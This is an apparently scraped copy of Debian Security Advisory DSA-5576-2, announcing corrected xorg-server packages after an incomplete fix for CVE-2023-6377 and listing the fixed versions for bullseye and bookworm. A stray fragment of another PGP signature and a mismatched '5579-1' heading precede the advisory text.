SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmV/P8AACgkQEMKTtsN8TjZOgw//e8Bv/IaGizwfZv1pgt7WltqB7B/CcwaP4S1ARybOAEShsVvMUojq3oocT8xG37LWJ6POh1w9Ks8mEtmhAcyap0L7oO+xUyBsvIy1Wqa+XK26AVeAtbSNyyr8jIzfD/5B0cT8mhs7d3t1EhuLucB5n3VL2KWU3INRuo0Az7rBxrQO5lzT46dBJueJDX4f5jIEVEbxvLCkox/COz0eQW2S0m+ry6qKnVf8F7lBBMEZQVzQrHI3sV5Eo9vKPGIBlQmf05qm04utwbOxKWCU3Aq+3aVt+5DJ62oGPBS/aLjsi3pN2wSay3kE/xV/CUyV4N5R9NYPFqyPBC8gPgwDg1gOvIEFP1nXKpxWK+JtLRpZDg4Gl5Wmo9aE9Qinw7ajxY/MbtL+U0QsfqL2TKnZs0yVineV6aUffSZ6r64BK2FEVN5ZoRM4G59++8iE45xX2QxM8DklmYc3Utyo2nmmckJNfwRnevTxesDHjxSUPMQe/gGtpFSiXmHK6LoQFxcv5+p8LS6JcRQINNXtcyHnRJt2jFsOKWZ5C84iNSy9tN+wtvR4dIOOSuGcxkmyDeIjFOMKXeYxqfqurWC0ipXJ39agh0Co4kqUXtPClpGg++/zVKZ3fNW6sQ/NVYKmEj2YPY/39EWV894huQiXRkzpykOWIa/54Knpxz60FBID3s/7gU4==zfhY-----END PGP SIGNATURE-----

Debian Security Advisory 5579-1

Debian Linux Security Advisory 5576-2 - The initial fix for CVE-2023-6377 as applied in DSA 5576-1 did not fully fix the vulnerability. Updated packages correcting this issue including the upstream merged commit are now available.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5576-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 17, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2023-6377

The initial fix for CVE-2023-6377 as applied in DSA 5576-1 did not fully  
fix the vulnerability. Updated packages correcting this issue including  
the upstream merged commit are now available.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2:1.20.11-1+deb11u10.

For the stable distribution (bookworm), this problem has been fixed in  
version 2:21.1.7-3+deb12u4.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmV+8INfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RTSRAAmuUhWkJzbFNJZzIZxvPxX4grTvBw5TlvOs9VovPtHWmlvnqzIvA3Q47Z  
6asqdnWqTgEamK3Bgb/+s6qOzqK4G8cRtP1dq1dvg/OimwKRY96x/Z6+aySW4UEC  
SPDroT7AXAEMPzYMbgsZh+SIfQLtevEKf0SiuFpF3/e5qWajpZspn+/1o/WEGvxY  
CqjX+fOrXTWaR17faUiV8fCyZn0ApXv/XSnimgSXniYiK8tmXWNMbl4lyhP1XTuc  
NP3wNU0NFmsOXJNtxqpz/IQUvS/OzkNye9v9s/usmigLBlVo7J0wwM7r2d/BMVpt  
PiwBgo6vFf67l53X7iSG6OkMWUazmO5K9xEGuOdHsmKkZg96V7mJPyuSfsk8vXrN  
aXsHBXk4EwbYFcGXpH8l62GJ5QwzhYnlwIvmGh+DuQbrI6bk/wOdTVe99PbduGm8  
tftGQFryg9Uy5KHyegMl9zR7jT/KkE/hGEB9KCwyWVPYmUxAEo5WMRL0YFMH2R4n  
4luimBbgLMTi7yWmkG7TLgfedPOvW6cJxs5Qnft0DH0q1sJVYinZ0nvfdCPROF2N  
+t2Ko/oDHSyD+ylX9h4VVKoI505cqvdn1mzGXRa8O7d0nyA0O5OPF+2MJPTlvn1d  
qmcbU1om+fKAdZdSIkHF4cZ3yymmQYoc0udUJk1q2csLOivks2A=  
=pTcv  
-----END PGP SIGNATURE-----

Tag

#debian